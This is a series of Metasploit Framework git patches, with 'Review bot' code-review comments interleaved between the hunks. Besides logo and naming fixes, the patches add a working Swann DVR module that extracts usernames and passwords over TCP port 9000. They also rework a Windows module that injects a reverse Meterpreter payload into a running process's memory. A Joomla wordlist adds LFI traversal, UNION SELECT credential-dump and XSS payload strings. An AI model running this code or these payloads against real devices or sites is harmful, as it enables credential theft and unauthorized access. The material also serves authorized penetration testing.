From: Tod Beardsley <todb@metasploit.com> Date: Wed, 23 Jan 2013 14:18:40 -0600 Subject: [PATCH 128/421] One more backslash --- lib/msf/ui/logos/figlet.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/ui/logos/figlet.txt b/lib/msf/ui/logos/figlet.txt index 1567ea1774f8..edabcbeba2d6 100644 --- a/lib/msf/ui/logos/figlet.txt +++ b/lib/msf/ui/logos/figlet.txt @@ -3,5 +3,5 @@ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ - |/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\ + |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ From e9205945341234b3f65b4e6456cb916892de42f0 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Wed, 23 Jan 2013 14:23:38 -0600 Subject: [PATCH 129/421] Whitespace cleanup, no blank lines plz --- lib/msf/ui/logos/3kom-superhack.txt | 3 +-- lib/msf/ui/logos/cow-head.txt | 3 +-- lib/msf/ui/logos/cowsay.txt | 1 - lib/msf/ui/logos/figlet.txt | 1 - lib/msf/ui/logos/i-heart-shells.txt | 1 - lib/msf/ui/logos/ninja.txt | 4 +--- 6 files changed, 3 insertions(+), 10 deletions(-) diff --git a/lib/msf/ui/logos/3kom-superhack.txt b/lib/msf/ui/logos/3kom-superhack.txt index 4d1123f35429..e1fda3898167 100644 --- a/lib/msf/ui/logos/3kom-superhack.txt +++ b/lib/msf/ui/logos/3kom-superhack.txt @@ -16,5 +16,4 @@ |______________________________________________________________________________| | | | http://metasploit.pro | -|______________________________________________________________________________| -%clr +|______________________________________________________________________________|%clr diff --git a/lib/msf/ui/logos/cow-head.txt b/lib/msf/ui/logos/cow-head.txt index 479ea81822d8..d7746ac21992 100644 --- a/lib/msf/ui/logos/cow-head.txt +++ b/lib/msf/ui/logos/cow-head.txt @@ -13,5 +13,4 @@ ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ - '(.,...."/ -%clr + '(.,...."/%clr 
diff --git a/lib/msf/ui/logos/cowsay.txt b/lib/msf/ui/logos/cowsay.txt index dbe42d87aca8..15512d455609 100644 --- a/lib/msf/ui/logos/cowsay.txt +++ b/lib/msf/ui/logos/cowsay.txt @@ -6,4 +6,3 @@ \ (oo)____ (__) )\ ||--|| * - diff --git a/lib/msf/ui/logos/figlet.txt b/lib/msf/ui/logos/figlet.txt index edabcbeba2d6..972e7363c00f 100644 --- a/lib/msf/ui/logos/figlet.txt +++ b/lib/msf/ui/logos/figlet.txt @@ -4,4 +4,3 @@ | | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ - diff --git a/lib/msf/ui/logos/i-heart-shells.txt b/lib/msf/ui/logos/i-heart-shells.txt index aeaff31aaae3..5c1c64dd8980 100644 --- a/lib/msf/ui/logos/i-heart-shells.txt +++ b/lib/msf/ui/logos/i-heart-shells.txt @@ -6,4 +6,3 @@ %whiIIIIII %red'YvP'%clr `-.__|__.-' I love shells --egypt - diff --git a/lib/msf/ui/logos/ninja.txt b/lib/msf/ui/logos/ninja.txt index 3404d7174b4e..70a5317a2473 100644 --- a/lib/msf/ui/logos/ninja.txt +++ b/lib/msf/ui/logos/ninja.txt @@ -27,6 +27,4 @@ # # ### # # ## ######################## ## ## ## ## - http://metasploit.pro -%clr - + http://metasploit.pro%clr From 3b65f31d956f5e54e364df865871b43de4d064fd Mon Sep 17 00:00:00 2001 From: lmercer <lmercer@mit.edu> Date: Wed, 23 Jan 2013 15:23:40 -0500 Subject: [PATCH 130/421] post/multi/manage/sudo improved with the PASSWORD option as described in Redmine Feature #7581 --- modules/post/multi/manage/sudo.rb | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index e2e1273030f5..8b7b2f672f00 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb 
@@ -30,7 +30,9 @@ def initialize(info={}) versions from 2008 and later which support -A. }, 'License' => MSF_LICENSE, - 'Author' => [ 'todb <todb[at]metasploit.com>'], + 'Author' => [ 'todb <todb[at]metasploit.com>', + 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option + ], 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ @@ -39,6 +41,11 @@ def initialize(info={}) ], 'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter' )) + + register_options( + [ + OptString.new('PASSWORD', [false, 'The password to use when running sudo.']) + ], self.class) end # Run Method for when run command is issued @@ -57,7 +64,12 @@ def run end def get_root - password = session.exploit_datastore['PASSWORD'] + if datastore['PASSWORD'] + password = datastore['PASSWORD'] + else + password = session.exploit_datastore['PASSWORD'] + end + if password.to_s.empty? print_status "No password available, trying a passwordless sudo." else From cfde24785c771cb64206e55a5712c1dcb9e256a6 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Wed, 23 Jan 2013 14:23:58 -0600 Subject: [PATCH 131/421] Adds a password grabber module for Swann DVRs --- .../scanner/misc/swann_dvr_passwords.rb | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/auxiliary/scanner/misc/swann_dvr_passwords.rb diff --git a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb new file mode 100644 index 000000000000..45f4eab6604a --- /dev/null +++ b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb 
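Review bot: In `get_root`, `if datastore['PASSWORD']` treats an empty string as set, because only nil and false are falsy in Ruby. A blank PASSWORD would then shadow the session's stored password instead of falling back to it. Test for emptiness instead, e.g. `password = datastore['PASSWORD'].to_s.empty? ? session.exploit_datastore['PASSWORD'] : datastore['PASSWORD']`. The new option also keeps a sudo password in the module datastore, where it may be persisted or shown in option listings, which the option description could mention. `get_root` continues outside the hunk.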
@@ -0,0 +1,112 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Swann DVR Password Retriever', + 'Description' => %q{ + This module takes advantage of a protocol design issue with the + Swann DVR systems. It is possible to retrieve the username and + password through the TCP service running on port 9000. Other + brand DVRs with the same issue may include Lorex, Night Owl, Zmodo + URMET, nad KGuard Security. + }, + 'Author' => + [ + 'someluser', # Python script + 'hdm', # Metasploit module + ], + 'References' => + [ + [ 'URL', 'http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html' ] + ], + 'License' => MSF_LICENSE + ) + + register_options( [ Opt::RPORT(9000) ], self.class) + end + + def run_host(ip) + req = + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0E\x0F" + + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x00" + + ( "\x00" * 475 ) + + connect + sock.put(req) + + buf = "" + begin + # Pull data until the socket closes or we time out + Timeout.timeout(15) do + loop do + res = sock.get_once(-1, 1) + buf << res if res + end + end + rescue ::Timeout::Error + rescue ::EOFError + end + + disconnect + + info = "" + mac = nil + ver = nil + + creds = {} + + buf.scan(/[\x00\xff]([\x20-\x7f]{1,32})\x00+([\x20-\x7f]{1,32})\x00\x00([\x20-\x7f]{1,32})\x00/m).each do |cred| + # Make sure the two passwords match + next unless cred[1] == cred[2] + creds[cred[0]] = cred[1] + end + + if creds.keys.length > 0 + creds.keys.sort.each do |user| + pass = creds[user] + report_auth_info({ + :host => rhost, + :port => rport, + :sname => 
'dvr', + :duplicate_ok => false, + :user => user, + :pass => pass + }) + info << "(user='#{user}' pass='#{pass}') " + end + end + + # Look for MAC address + if buf =~ /([0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2}\-[0-9A-F]{2})/mi + mac = $1 + end + + # Look for version + if buf =~ /(V[0-9]+\.[0-9][^\x00]+)/m + ver = $1 + end + + info << "mac=#{mac} " if mac + info << "version=#{ver} " if ver + + return unless (creds.keys.length > 0 or mac or ver) + + report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => info) + print_good("#{rhost}:#{rport} #{info}") + end + +end From 477ab65d55be2985cf2a0b0ed347a54ca7c5ac02 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Wed, 23 Jan 2013 23:05:22 +0200 Subject: [PATCH 132/421] Exploit::Remote::Web: added #tries method #tries method indicates how many times we should run a module until we establish a session. --- lib/msf/core/exploit/web.rb | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/exploit/web.rb b/lib/msf/core/exploit/web.rb index bd86a410cbb8..df77fa4c366d 100644 --- a/lib/msf/core/exploit/web.rb +++ b/lib/msf/core/exploit/web.rb @@ -28,7 +28,7 @@ def initialize( info = {} ) super register_options([ - OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ), + OptString.new( 'PATH', [ true, 'The path to the vulnerable script.', '/' ] ), OptString.new( 'GET', [ false, "GET parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ), OptString.new( 'POST', [ false, "POST parameters. ('foo=bar&vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ), OptString.new( 'COOKIES', [ false, "Cookies to be sent with the request. ('foo=bar;vuln=#{WEB_PAYLOAD_STUB}', #{WEB_PAYLOAD_STUB} will be substituted with the payload.)", "" ] ), 
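Review bot: `run_host` records the recovered passwords twice: once through `report_auth_info`, and again in clear text inside `info`, which is passed to `report_service(... :info => info)` and `print_good`. That copies the secrets into the service record and console output, outside the credential store. Limit `info` to the MAC and version plus a count, e.g. `info << "users=#{creds.keys.length} "`, and leave the passwords to `report_auth_info`. Separately, `disconnect` is not in an `ensure`, so it appears to be skipped if `sock.put` raises.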
@@ -76,13 +76,19 @@ def check def exploit print_status "Sending HTTP request for #{path}" if res = perform_request - print_status "The server responded with HTTP status code #{res.code}." - else - print_status 'The server did not respond to our request.' - end + print_status "The server responded with HTTP status code #{res.code}." + else + print_status 'The server did not respond to our request.' + end handler + end + + def tries + 1 end + private + def perform_request send_request_cgi({ 'global' => true, From 22f76198927508e26fc5652e5bff490caa4431c1 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:15:14 -0600 Subject: [PATCH 133/421] Improve Carlos' payload injection module - See #1201 Lots of changes, mainly: * Description update * Avoid accessing protected methods * More careful exception & return value handling --- .../exploits/windows/local/payload_inject.rb | 115 +++++++++++------- 1 file changed, 70 insertions(+), 45 deletions(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 73bb94aa4520..268b13a02bfe 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -16,9 +16,9 @@ def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Memory Payload Injection Module', 'Description' => %q{ - This module will inject into the memory of a process a specified windows payload. - If a payload or process is not provided one will be created by default - using a reverse x86 TCP Meterpreter Payload. + This module will inject a payload into memory of a process. If a payload + isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID + datastore option isn't specified, then it'll inject into notepad.exe instead. }, 'License' => MSF_LICENSE, 'Author' => 
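Review bot: The bare `private` added before `perform_request` also applies to every method defined after it in this module. The hunk does not show what follows, so confirm nothing below is meant to be called with an explicit receiver. The new `tries` has no comment; one such as `# Number of times the module should be run before giving up on establishing a session.` would put the contract from the commit message next to the code. `perform_request` continues outside the hunk.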
@@ -34,31 +34,45 @@ def initialize(info={}) register_options( [ - OptInt.new('PID', - [false, 'Process Identifier to inject of process to inject payload.']) + OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), + OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false]) ], self.class) end # Run Method for when run command is issued def exploit + @payload_name = datastore['PAYLOAD'] + @payload_arch = framework.payloads.create(@payload_name).arch + # syinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? - pid = datastore['PID'] - - if pid == 0 - pid = create_temp_proc() + pid = get_pid + if not pid + print_error("Unable to get a proper PID") + return end - if payload.send(:pinst).arch.first =~ /64/ and client.platform =~ /x86/ + if @payload_arch.first =~ /64/ and client.platform =~ /x86/ print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") print_error("Migrate to an x64 process and try again.") return false else - inject_into_pid(pid,datastore['NEWPROCESS']) + inject_into_pid(pid) end end + # Figures out which PID to inject to + def get_pid + pid = datastore['PID'] + if pid == 0 or datastore['NEWPROCESS'] + print_status("Launching notepad.exe...") + pid = create_temp_proc + end + + return pid + end + # Checks the Architeture of a Payload and PID are compatible # Returns true if they are false if they are not def arch_check(pid) 
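Review bot: In `get_pid`, `if pid == 0 or datastore['NEWPROCESS']` discards a user-supplied PID whenever NEWPROCESS is true, and neither option description says so. State the precedence in the option text, e.g. `OptBool.new('NEWPROCESS', [false, 'Start a new notepad.exe and use it instead of PID', false])`. Prefer `||` to `or` in that condition to avoid the keyword's low precedence. `exploit` also mixes a bare `return` with `return false` on its two failure paths; pick one.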
@@ -66,12 +80,12 @@ def arch_check(pid) client.sys.process.processes.each do |p| # Check Payload Arch if pid == p["pid"] - print_status("Process found checking Architecture") - if payload.send(:pinst).arch.first == p['arch'] - print_good("Process is the same architecture as the payload") + vprint_status("Process found checking Architecture") + if @payload_arch.first == p['arch'] + vprint_good("Process is the same architecture as the payload") return true else - print_error("The PID #{ p['arch']} and Payload #{payload.send(:pinst).arch.first} architectures are different.") + print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.") return false end end 
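Review bot: The `print_error` at the end of this hunk interpolates `p['arch']` directly after the words "The PID", so the message shows an architecture where a process ID is expected. Naming both values reads more clearly: `print_error("Process #{pid} is #{p['arch']} but the payload is #{@payload_arch.first}.")`. `arch_check` starts and ends outside the hunk, so what it returns when no process matches `pid` is not visible; since `inject_into_pid` now relies on a falsy result to stop, that fall-through case should return `false` explicitly if it does not already.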
@@ -83,45 +97,56 @@ def arch_check(pid) def create_temp_proc() windir = client.fs.file.expand_path("%windir%") # Select path of executable to run depending the architecture - if payload.send(:pinst).arch.first== "x86" and client.platform =~ /x86/ + if @payload_arch.first== "x86" and client.platform =~ /x86/ cmd = "#{windir}\\System32\\notepad.exe" - elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x64/ + elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/ cmd = "#{windir}\\System32\\notepad.exe" - elsif payload.send(:pinst).arch.first == "x86_64" and client.platform =~ /x86/ + elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/ cmd = "#{windir}\\Sysnative\\notepad.exe" - elsif payload.send(:pinst).arch.first == "x86" and client.platform =~ /x64/ + elsif @payload_arch.first == "x86" and client.platform =~ /x64/ cmd = "#{windir}\\SysWOW64\\notepad.exe" end - # run hidden - proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + + begin + proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + rescue Rex::Post::Meterpreter::RequestError + return nil + end + return proc.pid end - def inject_into_pid(pid,newproc) - print_status("Performing Architecture Check") - # If architecture check fails and a new process is wished to inject to one with the proper arch - # will be created - if arch_check(pid) - pid = create_temp_proc() if newproc - print_status("Injecting #{payload.send(:pinst).name} into process ID #{pid}") - begin - print_status("Opening process #{pid}") - host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - print_status("Generating payload") - raw = payload.generate - print_status("Allocating memory in procees #{pid}") - mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) - # Ensure memory is set for execution - host_process.memory.protect(mem) - print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") - 
print_status("Writing the stager into memory...") - host_process.memory.write(mem, raw) - host_process.thread.create(mem, 0) - print_good("Successfully injected payload in to process: #{pid}") - rescue ::Exception => e - print_error("Failed to Inject Payload to #{pid}!") - print_error(e.to_s) + def inject_into_pid(pid) + vprint_status("Performing Architecture Check") + return if not arch_check(pid) + + begin + print_status("Preparing '#{@payload_name}' for PID #{pid}") + raw = payload.generate + + print_status("Opening process #{pid.to_s}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + if not host_process + print_error("Unable to open #{pid.to_s}") + return end + + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) + + # Ensure memory is set for execution + host_process.memory.protect(mem) + + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, raw) + host_process.thread.create(mem, 0) + print_good("Successfully injected payload in to process: #{pid}") + + rescue Rex::Post::Meterpreter::RequestError => e + print_error("Unable to inject payload:") + print_line(e.to_s) end end + end \ No newline at end of file From ad108900d5e3263a19ab6dad36d11b845ca76c5c Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:23:41 -0600 Subject: [PATCH 134/421] Why yes I know it's a module --- modules/exploits/windows/local/payload_inject.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 268b13a02bfe..cc4efe818254 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb 
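Review bot: In `create_temp_proc` the `if`/`elsif` chain has no `else`, so when the payload and session architectures match none of the four combinations `cmd` stays nil and is still passed to `client.sys.process.execute`. A final branch that reports the case and returns nil would keep the failure on the same path as the new `rescue`: `else` / `print_error("Unsupported payload/session architecture combination")` / `return nil`. The added `rescue Rex::Post::Meterpreter::RequestError` returns nil without printing the exception, so the later "Unable to get a proper PID" message loses the cause; `print_error(e.to_s)` before the return would match what `inject_into_pid` does. The new status line in `inject_into_pid` also carries over the typo "procees", and should read `print_status("Allocating memory in process #{pid}")`.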
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Memory Payload Injection Module', + 'Name' => 'Windows Manage Memory Payload Injection', 'Description' => %q{ This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID From 3418457b9aca9f7d3885d18cb1f52e6c0d992c5f Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:29:25 -0600 Subject: [PATCH 135/421] Small changes (extra comma + typo) --- modules/auxiliary/scanner/misc/swann_dvr_passwords.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb index 45f4eab6604a..559e439b6a4f 100644 --- a/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/swann_dvr_passwords.rb @@ -22,12 +22,12 @@ def initialize Swann DVR systems. It is possible to retrieve the username and password through the TCP service running on port 9000. Other brand DVRs with the same issue may include Lorex, Night Owl, Zmodo - URMET, nad KGuard Security. + URMET, and KGuard Security. }, 'Author' => [ 'someluser', # Python script - 'hdm', # Metasploit module + 'hdm' # Metasploit module ], 'References' => [ From 53599e4c4509c47794056cfa0ca681a1c22518af Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:32:57 -0600 Subject: [PATCH 136/421] It's better to have a version # in the title, easier to find --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index f786338546cf..9dace48321cc 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb 
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'SonicWALL GMS Arbitrary File Upload', + 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the From 9c3e9f798f13d809ce1e3749a4e3a3db2e29eb60 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:39:24 -0600 Subject: [PATCH 137/421] Lower the ranking, because it cannot auto-target. When it's excellent, Pro will fire this first, and that will only generate more traffic than actually popping a shell. --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 9dace48321cc..d0b10798ce84 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } From 75f3a62ac46eb2f94640c52b97fe70d94f254341 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 23 Jan 2013 16:43:36 -0600 Subject: [PATCH 138/421] Explain why we need this empty on_new_session --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index d0b10798ce84..4abf1ce64523 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb 
@@ -71,7 +71,7 @@ def initialize(info = {}) def on_new_session - + # on_new_session will force stdapi to load (for Linux meterpreter) end From 6e94c04a52bc2f90557bffe332abaeb7030051f2 Mon Sep 17 00:00:00 2001 From: f8lerror <f8lerror+git@gmail.com> Date: Wed, 23 Jan 2013 20:26:23 -0500 Subject: [PATCH 139/421] Code Corrections and Enhancements --- data/wordlists/joomla.txt | 627 ++++++++++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 160 +++-- 2 files changed, 719 insertions(+), 68 deletions(-) create mode 100755 data/wordlists/joomla.txt diff --git a/data/wordlists/joomla.txt b/data/wordlists/joomla.txt new file mode 100755 index 000000000000..b1e651d504bf --- /dev/null +++ b/data/wordlists/joomla.txt 
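Review bot: The added comment says the empty `on_new_session` "will force stdapi to load", but an empty body does nothing on its face, so the comment states an outcome without the mechanism. It should name what the override changes, along the lines of `# Empty override: <what the inherited hook would otherwise do>; needed so stdapi loads on Linux meterpreter`, with the placeholder filled in by someone who knows the parent class. The definition also takes no parameter; if the framework invokes this hook with the session object, as the usual `on_new_session(client)` signature suggests, the call would raise ArgumentError, so the signature is worth confirming.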
@@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php 
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery 
+components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="><script>alert('xss');</script> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ 
+components/com_cx/ +components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ 